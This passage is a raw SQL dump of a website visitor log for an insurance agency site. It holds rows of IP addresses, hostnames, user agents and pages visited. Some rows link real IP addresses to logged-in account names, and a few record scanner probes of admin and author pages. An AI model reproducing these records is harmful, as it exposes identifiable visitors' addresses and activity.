Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4923,'0b_8848acdb0ea29256fa3926438280d0d6','1458006215','173.208.136.170','173.208.136.170','/administrator/index.php','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','3','0',0),(4925,'0b_8848acdb0ea29256fa3926438280d0d6','1458006225','173.208.136.170','173.208.136.170','/administrator/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','3','0',0),(4926,'0b_95eba34291e810a357f8a49200c957c7','1458006431','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4929,'0b_95eba34291e810a357f8a49200c957c7','1458006470','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4932,'0b_b29bba27284267a427047118cb518c24','1458006853','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(4934,'0b_914b46de5a6144a547546aa8e8bf8073','1458007332','91.211.45.74','net091211045074.king-online.ru','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','ru','','','','','','','0','0',0),(4935,'0b_39499982bda102703c2b65d8f94be93d','1458008391','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win2003','Chrome 49','us','','','','','','','0','0',0),(4937,'0b_39499982bda102703c2b65d8f94be93d','1458008401','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win2003','Chrome 49','us','','','','','','','0','0',0),(4940,'0b_255fa0535fc2119edf2cf40b2020f50a','1458008975','180.76.15.142','baiduspider-180-76-15-142.crawl.baidu.com','/register/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(4943,'0b_fc699f11592d5eac5c313fba1bd1527f','1458011072','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4944,'0b_fc699f11592d5eac5c313fba1bd1527f','1458011081','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4946,'0b_084a76424c05744f7b413a0bec2aec4b','1458011087','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4947,'0b_612b93ea8f13e4609f577b0e3262eff9','1458011497','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(4949,'0b_a6745b99847b840a8dd335101472a249','1458013111','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4950,'0b_347a49f5da0d8bd28aaed3f8e346dc7a','1458013171','66.249.83.246,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(4952,'0b_a0e918a7d570f4dbb2700ee2e89c65d2','1458013171','66.249.83.209,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(4953,'0b_437d05a54b5f6e514b43d4e23f733da1','1458017225','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4956,'0b_31efced5c899106cdb48b11852cd6505','1458017313','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4959,'0b_31efced5c899106cdb48b11852cd6505','1458017315','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4961,'0b_31efced5c899106cdb48b11852cd6505','1458017317','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4964,'0b_31efced5c899106cdb48b11852cd6505','1458017319','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4965,'0b_31efced5c899106cdb48b11852cd6505','1458017321','62.210.90.118','62-210-90-118.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4968,'0b_3b8dcf1baf2cf816b709245caa6aea28','1458017628','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4970,'0b_de9c51d0d0d535b195fe086e8bc68263','1458019075','66.249.73.169','crawl-66-249-73-169.googlebot.com','/products.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4971,'0b_16b5c95f22fc0642b8641810f0c38f30','1458019522','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4974,'0b_de9c51d0d0d535b195fe086e8bc68263','1458019599','66.249.73.169','crawl-66-249-73-169.googlebot.com','/forms/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4977,'0b_dd1d9635cb639720ea57e5389c9135ad','1458019865','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(4979,'0b_24a60b9178853c4d9e06039719b52111','1458023557','104.168.23.179','104-168-23-179-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(4980,'0b_592c4aac714c3b52b650c3f94165fdfd','1458025306','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(4982,'0b_187795546025551e181cbb153e5bdd63','1458027766','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4985,'0b_5dbfa88622efa51b2ecc3e53c4aa12e1','1458031466','136.243.5.215','static.215.5.243.136.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(4986,'0b_5dbfa88622efa51b2ecc3e53c4aa12e1','1458031473','136.243.5.215','static.215.5.243.136.clients.your-server.de','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(4988,'0b_5dbfa88622efa51b2ecc3e53c4aa12e1','1458031539','136.243.5.215','static.215.5.243.136.clients.your-server.de','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(4989,'0b_8346162c6a9b8c80b8d4769c2acfe2d2','1458032356','69.30.198.178','69.30.198.178','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(4991,'0b_8346162c6a9b8c80b8d4769c2acfe2d2','1458032368','69.30.198.178','69.30.198.178','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4994,'0b_80830e8e13ea212774153d6fbc8ca4c4','1458032566','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4995,'0b_69e79487291faef9e10bb9960cc0553c','1458033816','66.249.73.178','crawl-66-249-73-178.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4998,'0b_a0885a5fb66aaaf8e940f890a0abf296','1458041026','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5000,'0b_1cb2a427ab2d6db6f08750c59d49e596','1458041313','45.79.89.188','li1188-188.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(5003,'0b_b5c9bbb4f7e9847fa51ced82abd042c6','1458041708','52.37.160.11','ec2-52-37-160-11.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5006,'0b_b5c9bbb4f7e9847fa51ced82abd042c6','1458041708','52.37.160.11','ec2-52-37-160-11.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5009,'0b_b5c9bbb4f7e9847fa51ced82abd042c6','1458041736','52.37.160.11','ec2-52-37-160-11.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5010,'0b_b5c9bbb4f7e9847fa51ced82abd042c6','1458041814','52.37.160.11','ec2-52-37-160-11.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5013,'0b_b5c9bbb4f7e9847fa51ced82abd042c6','1458041814','52.37.160.11','ec2-52-37-160-11.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(5015,'0b_279ba5af43c09812a1c5c358dc296d64','1458042210','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5016,'0b_cece8e583b7c21f2c04c4465c780a62b','1458043817','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5019,'0b_3336914408e1853122c6b47167da742e','1458046425','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5021,'0b_47f9a56d2bf3633613bfa7dbdd65c513','1458047073','208.115.111.66','208-115-111-66-reverse.wowrack.com','/igo/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5022,'0b_8824586c6ba4616559abac59018cb1d2','1458047415','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5024,'0b_8824586c6ba4616559abac59018cb1d2','1458047417','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(5027,'0b_2f64e87a4d405eb3e9febe88e762b294','1458048152','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','roisy','','0','0',0),(5028,'0b_2f64e87a4d405eb3e9febe88e762b294','1458048154','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','roisy','','0','0',0),(5031,'0b_fef4258fa772b53c89fa97598c64c054','1458048215','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5033,'0b_b14c897254c0959f1744cb674bd847cb','1458050625','85.248.227.163','ori.enn.lu','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://pizza-imperia.com/','',0,'Linux','Chrome 37','lu','','','','','','','2','0',0),(5034,'0b_10dadf7b9718550a541183465245b984','1458050628','93.115.95.202','lh28409.voxility.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://pizza-imperia.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(5037,'0b_2cefa02a276b7e062f64d77633649026','1458052428','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(5040,'0b_e4b27ae39fb98b35b561d27714da3fba','1458052932','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(5042,'0b_0e650ccd024dc63c5e7c01ec0beef77e','1458053465','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(5043,'0b_509b7eeda5047011bc1f3df956a21665','1458054407','69.175.67.58','newscan04.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5045,'0b_509b7eeda5047011bc1f3df956a21665','1458054411','69.175.67.58','newscan04.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5046,'0b_509b7eeda5047011bc1f3df956a21665','1458054413','69.175.67.58','newscan04.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5049,'0b_509b7eeda5047011bc1f3df956a21665','1458054425','69.175.67.58','newscan04.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5052,'0b_509b7eeda5047011bc1f3df956a21665','1458054427','69.175.67.58','newscan04.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(5055,'0b_1ee63769bf4cb10c6347e7ef4188b13d','1458056401','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(5057,'0b_5d05b71a9bf0c4257cc16dcc2dc9da00','1458056428','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5060,'0b_d3ade17ec8185d81dba37f3dc2439a93','1458056432','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(5063,'0b_d3ade17ec8185d81dba37f3dc2439a93','1458056442','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(5064,'0b_d3ade17ec8185d81dba37f3dc2439a93','1458056447','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(5066,'0b_ead32817f490deefd4f38fe80dca2a45','1458057356','216.164.160.87','216-164-160-87.c3-0.eas-ubr6.atw-eas.pa.static.cable.rcn.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','il','1366 x 768','','','','','','0','0',0),(5069,'0b_ead32817f490deefd4f38fe80dca2a45','1458057359','216.164.160.87','216-164-160-87.c3-0.eas-ubr6.atw-eas.pa.static.cable.rcn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','il','1366 x 768','','','','','','0','0',0),(5070,'0b_ead32817f490deefd4f38fe80dca2a45','1458057380','216.164.160.87','216-164-160-87.c3-0.eas-ubr6.atw-eas.pa.static.cable.rcn.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','il','1366 x 768','','','','','','0','0',0),(5073,'0b_ead32817f490deefd4f38fe80dca2a45','1458057454','216.164.160.87','216-164-160-87.c3-0.eas-ubr6.atw-eas.pa.static.cable.rcn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 49','il','1366 x 768','','','','','','0','51',0),(5076,'0b_ead32817f490deefd4f38fe80dca2a45','1458057489','216.164.160.87','216-164-160-87.c3-0.eas-ubr6.atw-eas.pa.static.cable.rcn.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'Win8','Chrome 49','il','1366 x 768','','','','','','0','51',0),(5078,'0b_430f9a150129897a708253e751bface7','1458060247','66.249.83.217,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(5081,'0b_77e4e2f966eaa0864751e5d30cfd2659','1458060526','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(5082,'0b_77e4e2f966eaa0864751e5d30cfd2659','1458060546','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(5084,'0b_8824586c6ba4616559abac59018cb1d2','1458062565','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(5087,'0b_8824586c6ba4616559abac59018cb1d2','1458063176','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(5090,'0b_2f64e87a4d405eb3e9febe88e762b294','1458063350','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','0',0),(5093,'0b_2f64e87a4d405eb3e9febe88e762b294','1458063429','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(5094,'0b_2f64e87a4d405eb3e9febe88e762b294','1458063430','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','0',0),(5096,'0b_2f64e87a4d405eb3e9febe88e762b294','1458063435','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','roisy','','0','51',0),(5099,'0b_220067277f7ab7b8ac5d3ca5f8c034ad','1458064284','130.185.155.74','130.185.155.74','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(5100,'0b_220067277f7ab7b8ac5d3ca5f8c034ad','1458064294','130.185.155.74','130.185.155.74','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(5103,'0b_220067277f7ab7b8ac5d3ca5f8c034ad','1458064305','130.185.155.74','130.185.155.74','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(5106,'0b_7947cdd3507b9bd470c998c0323d7df1','1458065786','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5108,'0b_7947cdd3507b9bd470c998c0323d7df1','1458065787','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5109,'0b_7947cdd3507b9bd470c998c0323d7df1','1458065838','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(5112,'0b_7947cdd3507b9bd470c998c0323d7df1','1458065851','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(5114,'0b_35f86605bcbe376474ce5a6f09e49297','1458066709','209.17.114.44','209.17.114.44','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(5117,'0b_92c0d6fa85d3619840f94abb4a3ea58e','1458066745','54.193.56.86','ec2-54-193-56-86.us-west-1.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(5120,'0b_b71938834d66ead5f6a9fa6838b56432','1458066747','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1364 x 768','','','','','','0','0',0),(5123,'0b_92c0d6fa85d3619840f94abb4a3ea58e','1458066768','54.193.56.86','ec2-54-193-56-86.us-west-1.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; 